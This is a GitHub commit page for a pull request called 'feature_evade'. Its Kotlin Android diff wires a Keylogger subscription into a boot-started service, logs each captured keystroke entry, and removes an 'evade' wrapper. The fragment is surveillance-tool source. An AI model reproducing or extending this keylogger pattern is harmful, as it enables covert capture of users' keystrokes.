Skip to content

Commit

Permalink
Merge pull request #8 from evilthreads669966/feature_evade
Browse files Browse the repository at this point in the history
feature_evade
  • Loading branch information
evilthreads669966 authored Sep 29, 2020
2 parents db343b1 + eb732ae commit fa7c42b
Showing 1 changed file with 3 additions and 5 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -28,11 +28,9 @@ import com.evilthreads.keylogger.Keylogger
*/
class MyService: BootService() {
init {
evade {
lifecycleScope.launchWhenCreated {
Keylogger.subscribe { entry ->
Log.d("KEYLOGGER", entry.toString())
}
lifecycleScope.launchWhenCreated {
Keylogger.subscribe { entry ->
Log.d("KEYLOGGER", entry.toString())
}
}
}
Expand Down

0 comments on commit fa7c42b

Please sign in to comment.